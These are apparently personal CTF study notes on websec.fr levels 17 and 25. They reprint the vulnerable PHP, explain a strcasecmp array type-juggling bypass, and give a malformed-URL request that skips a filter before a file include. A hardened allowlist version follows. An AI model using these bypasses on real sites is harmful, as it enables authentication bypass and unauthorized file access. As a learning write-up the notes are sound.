「配枪朱丽叶。」

Root's CTF study notes.

websec.fr level17&level25 writeup

level17
<?php
include "flag.php";

function sleep_rand() { /* I wish php5 had random_int() */
        $range = 100000;
        $bytes = (int) (log($range, 2) / 8) + 1;
        do {  /* Side effect: more random cpu cycles wasted ;) */
            $rnd = hexdec(bin2hex(openssl_random_pseudo_bytes($bytes)));
        } while ($rnd >= $range);
        usleep($rnd);
}
?>
<?php
    if (! strcasecmp ($_POST['flag'], $flag))
        echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';   
    else
        echo '<div class="alert alert-danger">Invalid flag, sorry.</div>';
?>

In some PHP versions, strcmp() and strcasecmp() return 0 when they are passed an array instead of a string, so the `! strcasecmp($_POST['flag'], $flag)` check above passes without knowing the flag.

level25
<?php
if (!isset($_GET['page'])) {
  header('Location: http://websec.fr/level25/index.php?page=main');
  die();
}
?>
<?php
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}

include $_GET['page'] . '.txt';
?>

parse_url()
For seriously malformed URLs, parse_url() may return false. Indexing false with ['query'] yields nothing, parse_str() then fills $query with an empty array, the 'flag' filter loop never runs, and the `page` parameter still reaches the include:

http://websec.fr///level25///index.php?page=flag
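The hardened counterpart of the level25 code, as an added example (not the challenge's own source): treat a parse_url() failure as an error instead of an empty query, and resolve `page` against a fixed allowlist rather than a substring blocklist. The allowlist content (`main` only) is an assumption.

```php
<?php
// Added example, not the challenge's code. Assumption: "main" is the only
// legitimate page; a real site would list every include-able page here.

// The original filter re-parses REQUEST_URI, and parse_url() can return false
// for malformed URIs (the writeup relies on a URI starting with "///"),
// which silently turns $query into an empty array and skips the check.
function filtered_query(string $request_uri): ?array {
    $parts = parse_url($request_uri);
    if ($parts === false) {
        return null;            // unparsable URI: fail closed, not "no query"
    }
    parse_str($parts['query'] ?? '', $query);
    return $query;
}

// Resolve the requested page against an allowlist instead of blocking the
// substring "flag"; only known names can ever reach include.
function resolve_page(array $get, array $allowed = ['main']): ?string {
    $page = $get['page'] ?? null;
    if (!is_string($page) || !in_array($page, $allowed, true)) {
        return null;            // arrays, unknown names and traversal all rejected
    }
    return __DIR__ . '/' . $page . '.txt';
}

$query = filtered_query($_SERVER['REQUEST_URI'] ?? '');
$file  = ($query === null) ? null : resolve_page($_GET);
if ($file === null) {
    http_response_code(400);
    die('Bad request.');
}
include $file;
```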